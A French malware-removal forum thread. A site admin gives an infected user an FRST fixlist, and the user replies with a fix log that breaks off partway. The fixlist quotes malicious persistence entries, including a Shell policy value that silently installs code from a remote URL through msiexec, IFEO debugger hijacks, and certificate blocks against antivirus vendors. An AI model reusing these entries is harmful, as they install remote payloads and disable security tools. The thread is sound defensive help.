Beson d'aide infection

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Corum
Messages : 4
Inscription : 07 sept. 2017 14:03

Beson d'aide infection

Message par Corum » 08 sept. 2017 11:29

Bonjour, mon pc est probablement infecté par lucky123 et autres joyeusetée.

Les symptomes sont les suivants :

Impossible d'installer AdwCleaner ( car le pc decrete que mon administrateur bloque ce logiciel alors que je suis l'adminstrateur )
Impossible de desinstaller chrome
Impossible de definir un navigateur comme navugateur par defaut
Creation d'un repertoire ou un chrome.exe a été loger de manière automatique ( dans program files / Applemy ) qu j'ai reniommer applemy2 dans l'espoir de frener l'infection...

Etc... Etc...

J'ai donc lmu sur le forum les post qui de personne qui semblent avoir des problemes similaires, et pour gagner un peu de temps j'ai telecharger FRST
J'ai donc suvi le tuto.

Le scan est Fait.
Les rapports sont ici :
frst.txt : https://pjjoint.malekal.com/files.php?i ... k6k5u10x12
addition.txt : https://pjjoint.malekal.com/files.php?i ... z12d10k7y5
shotcut.txt : https://pjjoint.malekal.com/files.php?i ... q5y6u11j12

desormais je pense avoir besoin que quelqu'un m'aide pour la suite et me proposer un script de fix....

Merci de votre aide, ce probleme est trés habdicapant


Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 87572
Inscription : 10 sept. 2005 13:57
Contact :

Re: Beson d'aide infection

Message par Malekal_morte » 08 sept. 2017 11:50

Salut,

ouaip infecté et ça doit faire un moment, surement à la suite d'un crack vérolé.
En plus tu as eu la mauvaise idée d'installer reimage Repair et Yac.

Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :
AlphaGo
Reimage Repair
YAC(Yet Another Cleaner!)
puis :

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {201D921A-E3AD-46B5-B1C9-22DC70E81D3D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-08-15] (Reimage®) <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION  
 HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION  
 HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION  
 HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION  
 HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION  
 HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION  
 HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION  
 HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION  
 HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION  
 HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION  
 HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION  
 HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION  
 HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION  
 HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION  
 HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION  
 HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION  
 HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION  
 HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION  
 HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C] => C:\Program Files (x86)\Dayglad\Application\chrome.exe --no-startup-window /prefetch:5  
 HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [background_fault] => C:\Users\Yves\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION  
 C:\Users\Yves\AppData\Local\background_fault
 HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36] => C:\Program Files (x86)\Footjane\Application\chrome.exe --no-startup-window /prefetch:5  
 HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392] => C:\Program Files (x86)\Applemy\Application\chrome.exe --no-startup-window /prefetch:5  
 HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1XRWU1MkJSNWhLNYNSRkF8MdqyNjZYRWLQFkJLN8FyFq== /q <==== ATTENTION [Pays US - 104.28.17.238] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe 
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe 
 ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\Yves\AppData\Roaming\Njtain\Qugtthine.dll [145920 2017-04-28] () <==== ATTENTION  
 S2 WinSAPSvc; C:\Users\Yves\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION 
C:\Users\Yves\AppData\Roaming\Njtain
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION  
 R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION  
 R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION 
 R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION  
 R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION  
2017-09-06 17:36 - 2017-09-06 17:36 - 000004264 _____ C:\Windows\System32\Tasks\ReimageUpdater 
 2017-09-06 17:36 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Reimage Protector  
 2017-09-06 17:35 - 2017-09-06 17:37 - 000000000 ____D C:\rei 
 2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair  
 2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\Program Files\Reimage  
 2017-09-06 17:35 - 2017-09-06 17:35 - 000001943 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk 
 2017-09-06 16:50 - 2017-09-06 16:50 - 001622528 _____ C:\Users\Yves\Downloads\ResetBrowser.exe  
 2017-09-06 16:15 - 2017-09-06 16:15 - 008182736 _____ (Malwarebytes) C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe 
 2017-09-06 16:14 - 2017-09-06 17:37 - 000000150 _____ C:\Windows\Reimage.ini  
 2017-09-06 16:13 - 2017-09-06 16:13 - 000604928 _____ (Reimage) C:\Users\Yves\Downloads\ReimageRepair.exe  
 C:\Program Files (x86)\Elex-tech
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur


2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :
* Réinitialiser et réparer Mozilla Firefox
* Réinitialiser et réparer Google Chrome
* Réinitialiser et réparer Internet Explorer
(Ne pas utiliser Zeok)

3)
Faire un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Corum
Messages : 4
Inscription : 07 sept. 2017 14:03

Re: Beson d'aide infection

Message par Corum » 08 sept. 2017 12:30

Tout d'abord, milles merci pour votre réponse et votre aide rapide.
Je viens de finir le point 1.

Donc voici comme demander le rappart de fix :

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Ran by Yves (08-09-2017 12:03:00) Run:1
Running from C:\Users\Yves\Desktop
Loaded Profiles: Yves (Available Profiles: Yves)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {201D921A-E3AD-46B5-B1C9-22DC70E81D3D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-08-15] (Reimage�) <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C] => C:\Program Files (x86)\Dayglad\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [background_fault] => C:\Users\Yves\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION
C:\Users\Yves\AppData\Local\background_fault
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36] => C:\Program Files (x86)\Footjane\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392] => C:\Program Files (x86)\Applemy\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1XRWU1MkJSNWhLNYNSRkF8MdqyNjZYRWLQFkJLN8FyFq== /q <==== ATTENTION [Pays US - 104.28.17.238]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\Yves\AppData\Roaming\Njtain\Qugtthine.dll [145920 2017-04-28] () <==== ATTENTION
S2 WinSAPSvc; C:\Users\Yves\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION
C:\Users\Yves\AppData\Roaming\Njtain
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participa��es Ltda) <==== ATTENTION
2017-09-06 17:36 - 2017-09-06 17:36 - 000004264 _____ C:\Windows\System32\Tasks\ReimageUpdater
2017-09-06 17:36 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Reimage Protector
2017-09-06 17:35 - 2017-09-06 17:37 - 000000000 ____D C:\rei
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\Program Files\Reimage
2017-09-06 17:35 - 2017-09-06 17:35 - 000001943 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-09-06 16:50 - 2017-09-06 16:50 - 001622528 _____ C:\Users\Yves\Downloads\ResetBrowser.exe
2017-09-06 16:15 - 2017-09-06 16:15 - 008182736 _____ (Malwarebytes) C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe
2017-09-06 16:14 - 2017-09-06 17:37 - 000000150 _____ C:\Windows\Reimage.ini
2017-09-06 16:13 - 2017-09-06 16:13 - 000604928 _____ (Reimage) C:\Users\Yves\Downloads\ReimageRepair.exe
C:\Program Files (x86)\Elex-tech
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\MIO => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{201D921A-E3AD-46B5-B1C9-22DC70E81D3D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{201D921A-E3AD-46B5-B1C9-22DC70E81D3D} => key removed successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} => key not found.
C:\Windows\System32\Tasks\ReimageUpdater => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => key not found.
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => key removed successfully
